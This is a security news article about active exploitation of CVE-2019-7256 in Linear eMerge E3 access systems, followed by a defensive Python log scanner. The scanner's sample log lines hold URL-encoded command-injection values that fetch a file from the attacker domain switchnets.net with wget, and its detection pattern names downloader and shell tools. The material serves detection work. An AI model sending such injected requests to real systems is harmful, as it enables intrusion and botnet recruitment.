The Linear eMerge E3 building access system, created by Linear Solutions, has an unpatched vulnerability, identified as CVE-2019-7256, that was first announced in May 2019. In November 2019, proof-of-concept exploit code was released publicly. Now, researchers from SonicWall have warned that attackers are actively discovering vulnerable building access systems that are accessible directly over the Internet and exploiting them by sending a simple HTTP request to the systems. Attackers have already compromised over 2,300 of these systems and used them to launch distributed denial of service (DDoS) attacks.

The vulnerability allows attackers to command the building access system to download any file, execute it, and run shell commands of the attackers’ choosing. Attackers have been using this vulnerability to target the “card_scan_decoder.php” resource in the web-based interface of eMerge E3 systems to download malware from the domain “switchnets.net” and immediately execute the malware. Services such as Shodan can be used to discover vulnerable eMerge E3 systems that are directly addressable on the Internet, and it is also practical for attackers to scan the entire range of IPv4 addresses to find vulnerable systems.
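For defenders who front an eMerge E3 with a reverse proxy or capture its web traffic, the following added example (not from the original article or from SonicWall) flags requests to “card_scan_decoder.php” whose query string carries shell syntax or the “switchnets.net” domain. The combined log format, the `param` query name, and all sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

TARGET_RESOURCE = "card_scan_decoder.php"  # resource named in the article
KNOWN_DOMAIN = "switchnets.net"            # download domain named in the article
# Shell metacharacters and downloader names that do not belong in this query string.
SUSPICIOUS = re.compile(r"[`;|]|\$\(|\b(?:wget|curl|tftp|chmod|sh)\b", re.I)
# Assumed combined log format: client IP first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (client_ip, reasons) for a request to the target resource, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/" + TARGET_RESOURCE):
        return None
    # Decode twice so double-encoded metacharacters (%2560 -> %60 -> `) are seen.
    query = unquote_plus(unquote_plus(parts.query))
    reasons = []
    if SUSPICIOUS.search(query):
        reasons.append("shell-syntax-in-query")
    if KNOWN_DOMAIN in query.lower():
        reasons.append("known-download-domain")
    return client, reasons

def scan(lines):
    """Return only the requests that matched at least one indicator."""
    hits = [classify(line) for line in lines]
    return [h for h in hits if h and h[1]]

# Constructed sample log lines (documentation IP ranges, placeholder parameter name).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Feb/2020:10:00:00 +0000] "GET /card_scan_decoder.php'
    '?param=%60wget%20http%3A%2F%2Fswitchnets.net%2Fplaceholder%60 HTTP/1.1" 200 12',
    '198.51.100.4 - - [01/Feb/2020:10:01:00 +0000] "GET /card_scan_decoder.php'
    '?param=12345 HTTP/1.1" 200 12',
    '198.51.100.9 - - [01/Feb/2020:10:02:00 +0000] "GET /index.php?q=a;b HTTP/1.1" 200 5',
    '203.0.113.8 - - [01/Feb/2020:10:03:00 +0000] "GET /card_scan_decoder.php'
    '?param=%2560curl%2520example.invalid%2560 HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, ",".join(reasons))
```

Any request to this resource arriving from the Internet is worth reviewing, since the article notes these systems are found by Internet-wide scanning; the indicators above only separate likely exploitation attempts from other traffic.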